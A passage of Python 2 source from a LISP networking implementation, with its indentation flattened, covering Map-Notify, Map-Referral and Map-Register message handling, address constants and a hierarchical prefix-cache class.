eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache[ml].entries = {}
self.cache[ml].entries_sorted = []
self.cache_sorted = sorted(self.cache)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
self.cache[ml].entries_sorted = sorted(self.cache[ml].entries)
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry_key in self.cache[ml].entries_sorted:
entries = self.cache[ml].entries
if (entry_key in entries):
entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
